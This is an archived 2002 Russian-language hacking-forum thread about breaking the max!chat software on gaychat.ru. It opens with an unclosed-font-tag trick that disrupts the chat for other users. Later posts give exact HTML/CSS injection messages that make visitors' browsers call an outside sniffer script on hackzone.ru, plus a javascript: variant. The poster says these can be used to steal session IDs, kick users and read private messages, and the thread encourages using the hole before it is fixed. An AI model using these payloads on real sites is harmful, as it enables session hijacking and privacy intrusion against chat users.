PDA

Просмотр полной версии : Взломан max!chat (на примере gaychat.ru)


50r
17.10.2002, 00:20
www.gaychat.ru - заходите. регистрируетесь. входите в чат. и пишите что то типа

текст <font face=webdings> <font/><font/><font/><font/>

*<font/> - столько сколько хватит строки ввода.

эффект получается за счет не закрытого тэга фонта.. это надо видетьhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif) оччень эффектно!http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif) когда все последующие сообщения после вашего идут не слова и картинкиhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif) стоит повторить несколько раз подряд для достижения лучшего результата. и немного изменяйте фразу а то софт не пропускает одинаковые сообщения несколько раз подряд.

еще так же можно хделать тэги курсива и жирного шрифта.
в других чатах не пробовал... можно получится.

Юзайте пока дырку не прикрылиhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif)

Algol
17.10.2002, 12:47
Нда... любопытный чатик....
Но ломается он намного круче чем просто глюки с фонтом..
Например его можно сниферить:
В два этапа , сначала посылем такое сообщение:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&lt;a href=&quot;http://dsds.ds/?&quot;a=`&gt;input fdfs&lt;/a&gt;[/QUOTE]<span id='postcolor'>
И сразу же за ним еще одно:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(http://www.hackzone.ru/cgi-bin/sniff.cgi?Algol)` [/QUOTE]<span id='postcolor'>
(сообщения нужно посылать именно такие, &quot;лишние&quot; пробелы не удалять !http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif

Результат как говорится на лице ....
(вернее в логе хакзоны, а для тех кто в танке: лог хак зоны http://www.hackzone.ru/files/snifflog.txt)

50r
17.10.2002, 21:43
гмм... оригинално!:))
ну если как бэк можно вставить любой? урл, тооо... получается можно и скрипт какой то вставить или нет?
оччень очень интересная идЭя... :)

Algol
18.10.2002, 11:30
ты видимо не читал мои статьи, поэтому тебе кажется это оригинальным...
На самом деле это старая технология , приспособленная к особенностям данного чата.
А насчет скриптов - как ты правильно понял если можно вставить снифер, то можно вставить и скрипт, и узнать номера сессий, и кикнуть , и залезть в приват.. В общем по полной программе....
Для вставки скрипта вместо второго сообщения можно послать например :
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(javascript:alert())` [/QUOTE]<span id='postcolor'>

Только советую эксперементирвать в привате , дабы не шокировать публику ...

50r
01.11.2002, 01:09
а можно через скрипт менять размер шрифта? иль картинку вставлять?

17.10.2003, 16:19
ПРИВЕТ ВСЕМ